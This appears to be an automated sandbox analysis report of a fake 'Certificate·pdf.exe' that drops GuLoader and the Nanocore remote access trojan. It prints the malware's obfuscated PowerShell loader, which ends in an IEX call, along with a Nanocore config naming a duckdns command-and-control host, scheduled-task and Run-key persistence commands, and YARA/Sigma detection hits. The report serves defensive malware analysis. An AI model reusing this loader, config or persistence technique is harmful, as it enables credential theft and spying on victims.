SBPr0Co6ra1ExA T1Jf3Du1KoBSi1mi3 E1St8Us0En2Ub1 AFUm1 I8Un1Co1 d5Sh6Pu5Nd2La0To4 m1Vr9St0Ek5 F1moF s1St8qu1 T3Sk0 W4Br0 P5Lu4 S2Pa5LaF M5AnAtr5 h6 H5 CEPe3Ur1Ma3Pi2 P2Se2 F5 K6Ov3 D6Po5 BE C2 fD F3BoFSv1 S8Re0En2Ho4 S5 G4 S4Le2TaBTr5DuASa5Sa6Je2 TD O3 sFSh1Gr8 U0 O2la4ge5 s4 G4 V2 SB M5 eAFo5 u6 b2 DD b3HyFUp1 P8Pu0Po2 M4 W5Dd4Re4He2KaB b5BaANa5 M6Mo2UnD B3AlF R1 t8 L0 B2Cr4pr5Lu4 D4Ka2InBNi5 DASe5 O6 N2ToD K3BoF A1 R8Fe0 S2Ek4 F5fa4st4Fr2 CB M5LaAFo5 o6 H2TaDno3svFMu1Sa8 p0 B2 L4Co5Ae4 G4Sv2PiBUn5 SFBl5 S6 O5DeERu2SyDCh3 DFRe1Fo8Pa0 M2Re4 D5gr4Fr4Go2 EBRi5CyF D5 SF K5HeFRe'Pr)Sh;Ly&re(Yc`$ FrTaoars Si Mn pe Tr TsMa7 F) B Or(LaBDiropuPid dg KoRemComFoeGr0Ro4Vo B' S5 S2 G2Sa5Ta1In8Un1Fi7wo0Pe6Bu0 b5Bi1Bl3Hy1 E0Sm1 SATf1Cr7 R0Ti5 D1kiD L1Lg3Lo1Pr8 n5 D6 D4 DB A5 F6Sk2SaDFi2Lk5Ba0MiFja0Em5 C0 S2 S1ex3Ed1 MBOp5 U8 D2 P4 G0 C3 V1 S8 O0Ph2Da1fdF a1DiBly1 O3Ug5 U8 i3HoFCh1 t8Ec0 p2wi1 T3 S0 P4Ci1Ti9Gr0 V6 P2ba5Eg1Ap3An0 G4To0Fl0Ja1peFBl1Ku5Mi1 B3Se0 B5Su5Aa8 A3InBFi1Di7Vu0Fo4 K0 R5Mo1 FEFe1Ac7Ro1MaAEp2EfB I4DaCBa4vuCSt3 I1De1Mo3 R0Tj2 P3Co2Aa1Gn3Ko1 EAmi1Sa3En1 s1Un1 F7 f0 T2Hu1 U3Se3In0Aa1 C9Ma0Te4Ge3 m0 F0Si3ce1Be8 H1 u5Wi0Ve2 S1VaF r1 S9 C1Ha8 c2 P6 P1 S9 C1KaFSk1Be8Le0ro2 P1Se3 P0Ko4wi5 IE P5DiEUn1Sp0Ud1DiDRe0 T6Ny5Ar6Rn5 k2re3 S5 N1Ln9Ke1caBFa0 T6Ad1UnAMo1 O3 C1GyB F1 P3Nu1Dd8Al0Pr2 K1SeFSk1Oa8 B1An1Re5Dr6wo5Su2An0Ov4Le1Mi9 P0 s5 M1UsF R1Po8Nr1Pi3 A0Tr4Ga0 F5St4Ti0Pa5 CF G5 TA D5St6Ra5 LEPr3Ma1Uf3Ra2 M2Bo2 L5 B6Va3Co6Te5BlESp2 SDno3BiF L1Ei8Ko0En2Mu4Ma5st4Pe4Cr2 UB A5ReA B5Ca6ch2NoDRu3BeFMi1Fo8Au0 I2Pr4Ga5No4Kn4to2EnBUn5 FABu5Ru6 S2 NDSt3AfFDe1Fi8 S0 O2 O4Be5 K4Br4 T2InBMu5TrA A5Ro6Bi2 RDUd3SkFLi1St8 C0Bl2Il4 R5 Q4Co4 O2EnBAn5ReAKa5 F6Pl2HaDSt3JaF f1 K8ko0 W2 T4 D5 Z4kr4Re2 ABOb5 PF o5 B6ti5ZaEPo2 FD E3 PFIn1Fr8Su0 S2Un2 H6ro0Hv2Br0Co4Go2UnBPr5UgFBe5 LFrn5DiF H' S)Pr;Ra&Ha(Sk`$bor Vo KsFeiWinUdeSkrFosSl7Pr)Un Un(noBSjr Ru adKogknoNomcomPue A0un4Th St'Tu5Pr2Pr2Ke5Sc1 C3 U1ToB S1 S7 H1 P3 H1 A9Hy0Fr5Vi0 h2Co1Pe9Tv1 AB t1Ma7Et0Ab2Ud1 B7Or5Lo6 M4NeB A5Kn6Un5An2 S3 T2In1 SF N1Pr7re0Ia4Un0 SFUd5Di8To3diFPl1He8 B0 R0 C1 R9gl1 TD G1St3 B5 kEKa5SlB B4 B7 a5ViA r4 U6 O5 RA s4 N0Lo4Un2 d5 AA T4Ve6 P5UdAAr5Ba6 P4ko1Ra4 T5 T4 T7 I4SpFOm4 HF t4En0 G4Na7 C4Ca0 I5KnAHa4 B6 H5 DFWe'Le) v;Mi&In( S`$UnrRioDasEniBanDye ArAdsoc7Un)Ov Oa( AB sr SusudOdg So Nm Sm Ae S0Ju4 M Af' T5Fl2El3fj7En1Ba8Zo1Kl5Fl1 U3 S0Co5Ex0Tr2 L0Go4 S1LiF F1se7Ky1Pl8Je5bi6Ne4EaBUr5Sf6Tr5ek2 E2 F5 T1Ud8 S1 T7Ko0Ne6Sa0Br5Co1Un3Ti1 P0pu1ThA m1hu7Ta0 P5Fo1 WDSk1Sp3tr1So8Ka5Un8 F3ruFAn1Ko8 S0Hi0Bu1Op9 i1StD B1In3Pr5 PE K5En2Fi2 G5 K1Su3Dk1VeBTr1An7 F1Os3Li1 K9 A0Fi5 U0Co2 E1 P9Te1ExB C1Pr7sr0Be2Ny1Sm7Tr5 SAPe4Ru6An2 ME S4St4sk4Ru4Av5EnA d4pr6Te5 WAAp4 S6Lu5 gAGr4 A6 B5TeF C' b) S;Ps`$NoSPet GaFonBac KhSci PoPrnSkeSodCo2Ze= R`"""fj`$ Te LnMov R:LeLcaO SC EA RLAcAPaPEfPUnDRiA uTSaA R\ BSbok haBamScfPrlToe GlHisLueLinEls F\ Vf Fa GmSne MlSaeBesSts s\YaP Vr Ue Cg DeSon leMir Do Ru Ns A2br2Pa4Or\osAHitRoe Vi Ss UtMeiPlsCokBleNos F. ANUdo QnWe`""" I; S&Mu(Un`$ Pr Ao is JiGen SeLerBas R7 O) S Fo( TB Sr Gu Sd PgPhoBimSvmSkeAn0Uo4Al Si'Gu5 B2Be2Pa0Pr1Pi7Ar1Fo1Re0 P5 A0Da2 R1Dr3sk5Af6op4ZiBLo5 S6Br2FlDCo2 S5Sp0KoF B0po5Fo0Or2en1Aa3Om1 SBBi5Te8 L3EpF G3Ak9La5 s8 S3 L0 B1DuF d1BaA N1 F3 A2SkBSk4 BC U4 AC L2 A4Pr1Tr3 O1Fl7Sw1Er2Pi3dr7Hy1 SAEv1PrAAm3 F4No0GaF H0 I2Ka1 I3 M0My5 C5FlEHa5An2 N2sh5 A0 D2Ka1Di7 P1 D8Oc1 P5Di1UnE P1reF S1Un9 U1 E8 A1Ek3 H1 v2Sh4Co4pe5 TF E' R)Al; I`$TrISvn TfPoi GmHauKrm F=Le`$CoVMea ag Fs StKreFe.MacFio Su KnTrtpi- F1Be0 L2Ti4 S; P& F( G`$ ArGro TsUniMunFie SrUns S7Pr) I Kv(FaB srBiu PdIng ro TmEpm FeFa0So4 A s' A2 DDRa2 C5Se0SoFSp0Sk5Ko0 s2Bn1Un3 U1 RBTr5 H8 J2Ce4Ve0 C3Di1Br8 C0Te2 P1 UF U1inBPu1 P3 O5 P8 S3 DF K1No8Re0As2Ra1Sm3 D0Da4 A1Ma9Un0 S6Gs2 D5Ov1Na3Ta0 s4 R0Pr0St1OyFSa1 C5Ud1Sa3 V0Ba5 F5Ou8 U3ViB B1Al7 T0 O4 S0Su5 S1MyE R1 K7Ge1 GAla2 sBMa4 LC D4RuCBr3Sy5En1Re9 G0 O6Er0YnFFu5 LE k5 R2 C2 S0 A1qu7 T1Dj1 I0 W5pr0 C2Fi1Kr3 M5 IAFe5Kr6Ko4Lo7 M4 U6 C4Fe4Ve4 M2 t5BuABo5 D6 R5 T2Sl3 I7 S1 p8fl1sk5Ba1To3sm0Un5 L0 T2 P0Tr4Un1 MFCo1 H7Om1Fo8po5AlA u5 K6 V5 S2Ud3SlF B1Ac8si1Sk0Ma1AtF s1miBKa0Ne3 A1 NB t5FiFUd' s)Fo;va&Vi( P`$ srIno Ssimi Dn ceNerOps P7 D) B Mi(CyBAmr Eu SdChg DoMomRemJee s0 n4Sm Ve'st5 u2Sk1Fj0um1 S9ca0 P4 D1TuE F1CoF S1Oe8 T1 C2Oc0Ga4Ej1 A3Te0 P5Sa5 S6 O4MiBOv5 A6to2 VDsa2Ra5 A0PiF L0Di5 O0Sa2Pr1Su3Ri1 HB G5 C8Be2 S4Va0Ab3be1Vi8Ls0 T2Af1 PFFr1TrBPl1Bi3Sk5Hy8 V3FoF B1Sv8Fa0 E2Pa1 x3Ga0 U4 s1Pr9Un0 M6 A2 S5Le1Su3De0Ok4Sp0 C0Hj1SkFGe1fr5Mo1 h3 P0Ud5 B5 A8Po3SpBNo1Cu7 T0Bi4Ud0Fe5De1 FE P1 C7no1 DALa2 SB T4AnC C4BlCTe3 T1to1 A3Se0Bo2Fo3Af2Bi1 E3Di1AnA F1 P3He1 R1Ta1Sa7Os0Ga2 U1Sp3Ut3Wo0An1Br9 P0 T4 A3gr0Wa0Et3 p1ca8Fu1 D5 T0 N2Er1 DFRa1 p9Ov1Sk8Aa2Sl6 d1 S9 P1 UFFd1Fo8 D0Hi2 S1Gl3An0Ef4Ki5 EE J5PrEIs1Ov0Er1LeD C0Ta6 S5sk6 C5 S2Sk3 s5Rh1an9Re1udB T0 F6Ny1SuA T1Sc3 H1 FBov1an3Sk1He8 A0Ln2Bl1 HFIn1We8Wo1 K1In5Wh6Ti5Ma2 S3ReEGu1 E9Ci1FoAPe1Fe7No1Po4Je1FuF t0 L4Tr1Ru2Pr4 S7Pr4 S4 B4 H6Ne5YeFSi5AnAro5py6 A5NdE S3 U1Ps3Hm2In2Hy2 T5 M6Mu3Ro6Gl5SvESk2 KD S3AnF F1Th8Th0 M2Sk2 G6 A0 T2Gl0Ud4 D2 LBBj5 BABu5Ro6 C2 MDSp3OvFHa1Sl8 A0 N2 N2 R6Cl0 S2Do0De4Se2UnB U5KoA U5 B6 I2 UD C3BrFNo1 H8Sl0Un2 T2 E6Ra0 o2Un0 V4 O2FiB k5ApFOv5Su6 M5ViE S2psDca3MeF B1St8 G0Ma2Ps2An6 E0Ha2Bu0 E4Te2 UB D5BrF M5 SFHa5 lF R' T)Pe;fr& F(Uf`$Bir Korys KiFrnRoe BrHasTo7 D) B S( MB Fr KuRud Gg Ao Hm Im SeCo0To4Ta F'Bu5Me2Su1Vi0He1Ti9 F0 M4eu1 VECo1 gFCo1 U8 C1Re2Pi0 a4 A1Pa3Di0Sl5 S5Be8 D3PaF S1Hi8Pa0 S0 U1Mi9en1ScDHa1gl3Sv5DiEHa4 L6Sa5ReACr5Tr2 P3 A7 I1 H8Mu1Pr5Cp1Me3 B0Sh5 m0Sc2Ov0un4 M1 UFTa1 T7 S1 T8jo5AlA M4Up6Tr5 DFFo'Me)Ad# M;""";Function Nonschismatic9 { param([String]$Saleswomen); For($Antilabors=2; $Antilabors -lt $Saleswomen.Length-1; $Antilabors+=(2+1)){ $Brudgomme = $Brudgomme + $Saleswomen.Substring($Antilabors, 1); } $Brudgomme;}$Ironiernes0 = Nonschismatic9 'GeIPeEIbXIn ';&$Ironiernes0 (Nonschismatic9 $Boarspear);<#Microphytic udvandrere Trichosanthes Eudemons Longobardi Helicidae lundress #>;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 1072 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
          • schtasks.exe (PID: 3408 cmdline: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp" MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
            • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • CasPol.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0 MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Nanocore RAT, NanoCoreNanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Version": "1.2.2.0", "Mutex": "48e0e383-40c8-47b1-a4ea-d717ed94", "Group": "Default", "Domain1": "7fxcmft-olcmjfjxdk.duckdns.org", "Domain2": "", "Port": 3342, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "7fxcmft-olcmjfjxdk.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x3a85:$a: NanoCore
    • 0x3ade:$a: NanoCore
    • 0x3b1b:$a: NanoCore
    • 0x3b94:$a: NanoCore
    • 0x1723f:$a: NanoCore
    • 0x17254:$a: NanoCore
    • 0x17289:$a: NanoCore
    • 0x3023b:$a: NanoCore
    • 0x30250:$a: NanoCore
    • 0x30285:$a: NanoCore
    • 0x3ae7:$b: ClientPlugin
    • 0x3b24:$b: ClientPlugin
    • 0x4422:$b: ClientPlugin
    • 0x442f:$b: ClientPlugin
    • 0x16ffb:$b: ClientPlugin
    • 0x17016:$b: ClientPlugin
    • 0x17046:$b: ClientPlugin
    • 0x1725d:$b: ClientPlugin
    • 0x17292:$b: ClientPlugin
    • 0x2fff7:$b: ClientPlugin
    • 0x30012:$b: ClientPlugin
    00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
    • 0x3b1b:$a1: NanoCore.ClientPluginHost
    • 0x17289:$a1: NanoCore.ClientPluginHost
    • 0x30285:$a1: NanoCore.ClientPluginHost
    • 0x3ade:$a2: NanoCore.ClientPlugin
    • 0x17254:$a2: NanoCore.ClientPlugin
    • 0x30250:$a2: NanoCore.ClientPlugin
    • 0x3eb2:$b1: get_BuilderSettings
    • 0x1c1cf:$b1: get_BuilderSettings
    • 0x351cb:$b1: get_BuilderSettings
    • 0x3b69:$b4: IClientAppHost
    • 0x3f23:$b6: AddHostEntry
    • 0x3f92:$b7: LogClientException
    • 0x1c13e:$b7: LogClientException
    • 0x3513a:$b7: LogClientException
    • 0x3f07:$b8: PipeExists
    • 0x3b56:$b9: IClientLoggingHost
    • 0x172a3:$b9: IClientLoggingHost
    • 0x3029f:$b9: IClientLoggingHost
    00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe75:$x1: NanoCore.ClientPluginHost
    • 0xe8f:$x2: IClientNetworkHost
    00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
    • 0xe38:$x2: NanoCore.ClientPlugin
    • 0xe75:$x3: NanoCore.ClientPluginHost
    • 0xe5a:$i1: IClientApp
    • 0xe4e:$i2: IClientData
    • 0xe29:$i3: IClientNetwork
    • 0xec3:$i4: IClientAppHost
    • 0xe65:$i5: IClientDataHost
    • 0xeb0:$i6: IClientLoggingHost
    • 0xe8f:$i7: IClientNetworkHost
    • 0xea2:$i8: IClientUIHost
    • 0xed2:$i9: IClientNameObjectCollection
    • 0xef7:$i10: IClientReadOnlyNameObjectCollection
    • 0xe41:$s1: ClientPlugin
    • 0x177c:$s1: ClientPlugin
    • 0x1789:$s1: ClientPlugin
    • 0x11f9:$s6: get_ClientSettings
    • 0x1249:$s7: get_Connected
    Click to see the 10 entries
    SourceRuleDescriptionAuthorStrings
    5.2.CasPol.exe.244c4629.5.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      5.2.CasPol.exe.244c4629.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xb184:$x1: NanoCore.ClientPluginHost
      • 0xb1b1:$x2: IClientNetworkHost
      5.2.CasPol.exe.244c4629.5.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xb14f:$x2: NanoCore.ClientPlugin
      • 0xb184:$x3: NanoCore.ClientPluginHost
      • 0xb143:$i2: IClientData
      • 0xb165:$i3: IClientNetwork
      • 0xb174:$i5: IClientDataHost
      • 0xb19e:$i6: IClientLoggingHost
      • 0xb1b1:$i7: IClientNetworkHost
      • 0xb1c4:$i8: IClientUIHost
      • 0xb1d2:$i9: IClientNameObjectCollection
      • 0xb1ee:$i10: IClientReadOnlyNameObjectCollection
      • 0xaf41:$s1: ClientPlugin
      • 0xb158:$s1: ClientPlugin
      • 0x10179:$s6: get_ClientSettings
      5.2.CasPol.exe.244c4629.5.raw.unpackWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
      • 0xb184:$a1: NanoCore.ClientPluginHost
      • 0xb14f:$a2: NanoCore.ClientPlugin
      • 0x100ca:$b1: get_BuilderSettings
      • 0x10039:$b7: LogClientException
      • 0xb19e:$b9: IClientLoggingHost
      5.2.CasPol.exe.23fc0000.4.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      Click to see the 30 entries

      AV Detection

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

      E-Banking Fraud

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

      System Summary

      barindex
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4Fu1 KAOb1AnF H1tr5Hy' G;bo`$CoSDekLurSum AaStrCob eePrjbid Ee
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Ec32% -windowstyle minimized $Engrams252=(Get-ItemProperty -Path 'HKCU:\Jgerstuerne\').Curatives;%Ec32% -windowstyle minimized ($Engrams252), EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ParentProcessId: 1072, ParentProcessName: CasPol.exe, ProcessCommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", ProcessId: 3408, ProcessName: schtasks.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'', CommandLine: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\Certificate#U00b7pdf.exe, ParentProcessId: 4180, ParentProcessName: Certificate#U00b7pdf.exe, ProcessCommandLine: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'', ProcessId: 5620, ProcessName: powershell.exe

      Persistence and Installation Behavior

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine: "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ParentProcessId: 1072, ParentProcessName: CasPol.exe, ProcessCommandLine: "schtasks.exe" /create 